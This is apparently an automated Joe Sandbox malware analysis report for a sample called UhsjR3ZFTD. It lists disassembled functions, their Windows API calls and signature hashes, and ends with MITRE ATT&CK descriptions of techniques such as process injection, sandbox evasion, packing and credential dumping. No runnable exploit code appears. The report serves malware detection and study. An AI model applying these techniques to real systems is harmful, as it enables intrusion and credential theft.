Associated: 00000003.00000002.2227468931.00000000006F0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227485385.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227500965.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0000_UhsjR3ZFTD.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: 4d30357ed03cd5d9dd56456e710180a1604a57bfecd667e220f3216d5371ffde
Instruction ID: 166dc264aa3b3acd9c2bee358aba4ec5532fb591cdcd99603f4b1fc518f61e57
Opcode Fuzzy Hash: 4d30357ed03cd5d9dd56456e710180a1604a57bfecd667e220f3216d5371ffde
Instruction Fuzzy Hash: 45E04F30A85384B7EB201B62EC4AB9D3B979B10B51F244031F90DAC6F2DBA2E8509959

Function 006DD3BE Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(BB40E64E,00000000,00000000,?), ref: 006DD421

Part of subcall function 006D5471: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,006D6C45,?,00000000,-00000008), ref: 006D54D2

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 006DD673
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 006DD6B9
GetLastError.KERNEL32 ref: 006DD75C

Memory Dump Source

Source File: 00000003.00000002.2227416988.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000003.00000002.2227402386.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227447150.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227468931.00000000006F0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227485385.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227500965.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0000_UhsjR3ZFTD.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: 2263a3ad9130de97c65de942f2748c48a437094eacc689ea9d82b637ca4f1382
Instruction ID: 7e654446a10ae64200f688476df8e629b9d27da3274b236fdd5a2105a229fb9f
Opcode Fuzzy Hash: 2263a3ad9130de97c65de942f2748c48a437094eacc689ea9d82b637ca4f1382
Instruction Fuzzy Hash: 70D14AB5D042589FCF15DFA8D880AEDBBF6FF09314F28416AE466EB351D630A942CB50

Function 006D46E3 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 006D47AA
___AdjustPointer.LIBCMT ref: 006D47CD
___AdjustPointer.LIBCMT ref: 006D4869

Memory Dump Source

Source File: 00000003.00000002.2227416988.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000003.00000002.2227402386.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227447150.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227468931.00000000006F0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227485385.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227500965.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0000_UhsjR3ZFTD.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: c7578f95a455e3f191f7591e8af6711bbd362c25df8946a359d47251d8c898c2
Instruction ID: 290a2f462a62074062990e4b61bf86dc63b04f614bea5bd8ba6b7114c614a8fb
Opcode Fuzzy Hash: c7578f95a455e3f191f7591e8af6711bbd362c25df8946a359d47251d8c898c2
Instruction Fuzzy Hash: B951E172E05246AFDB288F50C881BBAB3A6FF05340F24412FE81997791EB31EC41DB90

Function 006DB1E6 Relevance: 6.1, APIs: 4, Instructions: 82COMMON

Download Yara Rule

APIs

Part of subcall function 006D5471: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,006D6C45,?,00000000,-00000008), ref: 006D54D2

GetLastError.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 006DB24A
__dosmaperr.LIBCMT ref: 006DB251
GetLastError.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 006DB28B
__dosmaperr.LIBCMT ref: 006DB292

Memory Dump Source

Source File: 00000003.00000002.2227416988.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000003.00000002.2227402386.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227447150.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227468931.00000000006F0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227485385.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227500965.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0000_UhsjR3ZFTD.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide
String ID:
API String ID: 1913693674-0
Opcode ID: 91193064c462a4d00d0ee22b6b853d02cca50bf9238de22d25f322905e60aa99
Instruction ID: 2b0b43f8fc2bb98f4bc8ddfb17423b32418e6fc2ef92712456ede86c7f5f4c03
Opcode Fuzzy Hash: 91193064c462a4d00d0ee22b6b853d02cca50bf9238de22d25f322905e60aa99
Instruction Fuzzy Hash: 19219072E00205EFDB20AF618881D7FB7AAEF02364712561EF8599B751DB30EE418B90

Function 006CCA72 Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2227416988.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000003.00000002.2227402386.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227447150.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227468931.00000000006F0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227485385.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227500965.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0000_UhsjR3ZFTD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f025c7ba3bafae7c8a973c8a816fff08e584b73a5314f0f1d11f6ea75dd075b
Instruction ID: 0746a24e70a9f7ec5d4e13d3ee71d6b49c3cfcc826e607b516846784251cd75b
Opcode Fuzzy Hash: 0f025c7ba3bafae7c8a973c8a816fff08e584b73a5314f0f1d11f6ea75dd075b
Instruction Fuzzy Hash: 96217F31600619AFCB50EFA59C95EBB77AAEF01374715451DF81DDB250EB30EC4187A0

Function 006DC5DE Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 006DC5E6

Part of subcall function 006D5471: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,006D6C45,?,00000000,-00000008), ref: 006D54D2

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 006DC61E
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 006DC63E

Memory Dump Source

Source File: 00000003.00000002.2227416988.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000003.00000002.2227402386.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227447150.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227468931.00000000006F0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227485385.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227500965.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0000_UhsjR3ZFTD.jbxd

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide
String ID:
API String ID: 158306478-0
Opcode ID: b0e02cdaeab57613ae6dec4347c9745a40555f6d35a85670694cab56029ca133
Instruction ID: c5b140bd517cf8cf70587aa988c3a9bdcd732e4bc69769815be370171150857c
Opcode Fuzzy Hash: b0e02cdaeab57613ae6dec4347c9745a40555f6d35a85670694cab56029ca133
Instruction Fuzzy Hash: 0E1104A1D01A9A7FA72127715CCACBF79AEDE893A4750241AF802D1300FE60CD0195B9

Function 006E4400 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,?,?,00000000,00000000,?,006E38EF,00000000,00000001,?,?,?,006DD7B0,?,00000000,00000000), ref: 006E4417
GetLastError.KERNEL32(?,006E38EF,00000000,00000001,?,?,?,006DD7B0,?,00000000,00000000,?,?,?,006DD0F6,?), ref: 006E4423

Part of subcall function 006E4480: CloseHandle.KERNEL32(FFFFFFFE,006E4433,?,006E38EF,00000000,00000001,?,?,?,006DD7B0,?,00000000,00000000,?,?), ref: 006E4490

___initconout.LIBCMT ref: 006E4433

Part of subcall function 006E4455: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,006E43F1,006E38DC,?,?,006DD7B0,?,00000000,00000000,?), ref: 006E4468

WriteConsoleW.KERNEL32(00000000,?,?,00000000,?,006E38EF,00000000,00000001,?,?,?,006DD7B0,?,00000000,00000000,?), ref: 006E4448

Memory Dump Source

Source File: 00000003.00000002.2227416988.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000003.00000002.2227402386.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227447150.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227468931.00000000006F0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227485385.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227500965.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0000_UhsjR3ZFTD.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: e3dce4ac7ba4bdde20ecc7810362184170dd5668e782ff9244aeb63bd1ce6405
Instruction ID: 0c1f85e47bf4f20877443e6ee56a867ac57e95673ff62e1f11f77bed4cc0a3ec
Opcode Fuzzy Hash: e3dce4ac7ba4bdde20ecc7810362184170dd5668e782ff9244aeb63bd1ce6405
Instruction Fuzzy Hash: 12F03736201294FBCF531FE5EC44A993FA7FB493A4B055010FA1889170CB338960DB95

Function 006CA395 Relevance: 6.0, APIs: 4, Instructions: 25timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?), ref: 006CA3A7
GetCurrentThreadId.KERNEL32 ref: 006CA3B6
GetCurrentProcessId.KERNEL32 ref: 006CA3BF
QueryPerformanceCounter.KERNEL32(?), ref: 006CA3CC

Memory Dump Source

Source File: 00000003.00000002.2227416988.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000003.00000002.2227402386.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227447150.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227468931.00000000006F0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227485385.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227500965.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0000_UhsjR3ZFTD.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 48b013122d02ae7bb38361cab42a42950241af6db9e656eefe8ba0c301a3e47d
Instruction ID: dec05fdcb9db8343e7399ed20c1ec2875004ec4153a06a29c4e53bdb608a31cd
Opcode Fuzzy Hash: 48b013122d02ae7bb38361cab42a42950241af6db9e656eefe8ba0c301a3e47d
Instruction Fuzzy Hash: C3F0B234C0030DEBCB00DBB4C98898EBBF4FF1C200BA15996E412EB110E730AB44CB50

Function 006D9D96 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 191COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 006D55BA: GetLastError.KERNEL32(00000000,?,006D793D), ref: 006D55BE
Part of subcall function 006D55BA: SetLastError.KERNEL32(00000000,?,?,00000028,006D1FF3), ref: 006D5660

GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,006CF869,?,?,?,00000055,?,-00000050,?,?,?), ref: 006D9E55
IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,006CF869,?,?,?,00000055,?,-00000050,?,?), ref: 006D9E8C

Strings

utf8, xrefs: 006D9F5E

Memory Dump Source

Source File: 00000003.00000002.2227416988.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000003.00000002.2227402386.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227447150.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227468931.00000000006F0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227485385.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227500965.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0000_UhsjR3ZFTD.jbxd

Similarity

API ID: ErrorLast$CodePageValid
String ID: utf8
API String ID: 943130320-905460609
Opcode ID: e5d19edca31601c55c81d55c9cfb06d86d529aeaf0f6c11d5840ddfdc6f38a55
Instruction ID: d568eb450087bfefaa26ed2ce6ba0fbe2614a824aee537a3ed82de95c5dcadca
Opcode Fuzzy Hash: e5d19edca31601c55c81d55c9cfb06d86d529aeaf0f6c11d5840ddfdc6f38a55
Instruction Fuzzy Hash: 9351C471E04301AADB69AB71CC42BF673ABAF45700F15052FF545DB381EB70D98096B5

Function 006D4DE0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 122COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,006D4CE1,?,?,00000000,00000000,00000000,?), ref: 006D4E05

Strings

RCC, xrefs: 006D4E1F
MOC, xrefs: 006D4E17

Memory Dump Source

Source File: 00000003.00000002.2227416988.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000003.00000002.2227402386.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227447150.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227468931.00000000006F0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227485385.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227500965.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0000_UhsjR3ZFTD.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 4ed9aac59775e8f91cb6c90ac09c3834c9d203e7bd6d01498e867e50e6fa7db5
Instruction ID: 40d8cde3cf1dd708f04527163ec683459525edcb8dba508aa544db83d4dcdd5c
Opcode Fuzzy Hash: 4ed9aac59775e8f91cb6c90ac09c3834c9d203e7bd6d01498e867e50e6fa7db5
Instruction Fuzzy Hash: ED413571D00209ABCF15DF98D881AEEBBB6BF48304F18415AF908A7361DB359D51DB50

Function 006D9AFA Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 006D5327: HeapFree.KERNEL32(00000000,00000000,?,006D96D4,?,00000000,?,?,006D9374,?,00000007,?,?,006D9CBA,?,?), ref: 006D533D
Part of subcall function 006D5327: GetLastError.KERNEL32(?,?,006D96D4,?,00000000,?,?,006D9374,?,00000007,?,?,006D9CBA,?,?), ref: 006D5348

___free_lconv_mon.LIBCMT ref: 006D9B3E

Strings

8o, xrefs: 006D9BE6
To, xrefs: 006D9B10

Memory Dump Source

Source File: 00000003.00000002.2227416988.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000003.00000002.2227402386.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227447150.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227468931.00000000006F0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227485385.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227500965.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0000_UhsjR3ZFTD.jbxd

Similarity

API ID: ErrorFreeHeapLast___free_lconv_mon
String ID: 8o$To
API String ID: 4068849827-4097019444
Opcode ID: 207a0ad1777b56e50f78e4f9543e9255d3c91081ef2eb2b0b061b1bfea7b7416
Instruction ID: 8f845076f473ea7681de5f513b951825c8658b27454987d44fe8b950460375b7
Opcode Fuzzy Hash: 207a0ad1777b56e50f78e4f9543e9255d3c91081ef2eb2b0b061b1bfea7b7416
Instruction Fuzzy Hash: 25314C31D00B04AEEB716A39E845BAA73EAFB04350F51581FE05AD7751EF71EC40CA64

Function 006D464C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 006D48C3

Strings

csm, xrefs: 006D48E5
csm, xrefs: 006D4956

Memory Dump Source

Source File: 00000003.00000002.2227416988.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000003.00000002.2227402386.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227447150.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227468931.00000000006F0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227485385.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227500965.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0000_UhsjR3ZFTD.jbxd

Similarity

API ID: ___except_validate_context_record
String ID: csm$csm
API String ID: 3493665558-3733052814
Opcode ID: cec44ff90cb3f615703a2aea4aabbdddd7316519af3b5e5caad02235652a194f
Instruction ID: 3a70ef5a1311adbc7e33400e1a3849bf5b85b60e05d6158528c57efbdcce4137
Opcode Fuzzy Hash: cec44ff90cb3f615703a2aea4aabbdddd7316519af3b5e5caad02235652a194f
Instruction Fuzzy Hash: 5C3181329002199BCF269F56C8949AB7BA7FB09315B18459BF8985D321CB33DC61DB81

Function 006C1DB0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 78libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 006C1E6E

Strings

VirtualProtect, xrefs: 006C1E61
@, xrefs: 006C1EB7

Memory Dump Source

Source File: 00000003.00000002.2227416988.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000003.00000002.2227402386.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227447150.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227468931.00000000006F0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227485385.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227500965.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0000_UhsjR3ZFTD.jbxd

Similarity

API ID: AddressProc
String ID: @$VirtualProtect
API String ID: 190572456-29487290
Opcode ID: 41fbe3fcc0634bc16172d27e5a3bec50ae95f0b78b08f3829117b3f4d789a645
Instruction ID: 1a39bf10bc275509c2bb5d5c11549f831b7f46fe989772c777423bf2bddb6e0c
Opcode Fuzzy Hash: 41fbe3fcc0634bc16172d27e5a3bec50ae95f0b78b08f3829117b3f4d789a645
Instruction Fuzzy Hash: 3D41D2B0900209DFDB04DFA9D998AAEBBF1FF48304F10841EE848AB351D775A944CF85

Function 006C39F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 006C3A1E
std::_Lockit::~_Lockit.LIBCPMT ref: 006C3A49

Strings

w2l, xrefs: 006C3A56

Memory Dump Source

Source File: 00000003.00000002.2227416988.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000003.00000002.2227402386.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227447150.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227468931.00000000006F0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227485385.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227500965.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0000_UhsjR3ZFTD.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_
String ID: w2l
API String ID: 593203224-126607045
Opcode ID: 7866a4aa9b0e68e05ff3af0b0829a8d468126f645a3304131a9e2b6db268f9d8
Instruction ID: 56b32f82c41ffb9ceb60bfb108dcd0a32ec55245e485ea997930840757c885cd
Opcode Fuzzy Hash: 7866a4aa9b0e68e05ff3af0b0829a8d468126f645a3304131a9e2b6db268f9d8
Instruction Fuzzy Hash: E101C0B0D04208DFCB44EFA8D881BADBBB1FB08300F8054ADE416AB351DB306A54CF55

Function 0040B4C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(004088CF), ref: 0040B4C6
FreeLibrary.KERNEL32 ref: 0040B4E7

Strings

#v, xrefs: 0040B4C6, 0040B4E7

Memory Dump Source

Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd

Similarity

API ID: FreeLibrary
String ID: #v
API String ID: 3664257935-554117064
Opcode ID: 7b2bc8b17d6824c900989cbedb41db33d3808025dd827478461ee9e026d6b8e7
Instruction ID: e439ef1e48a044a982acff6c66005ba8ca8214f92a7b3c2cab13b027e0846b4c
Opcode Fuzzy Hash: 7b2bc8b17d6824c900989cbedb41db33d3808025dd827478461ee9e026d6b8e7
Instruction Fuzzy Hash: 50C0027D981406DFCF012F65FE0E82D3A21BB66346B0400B5A80591275EABB0934BF2B

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
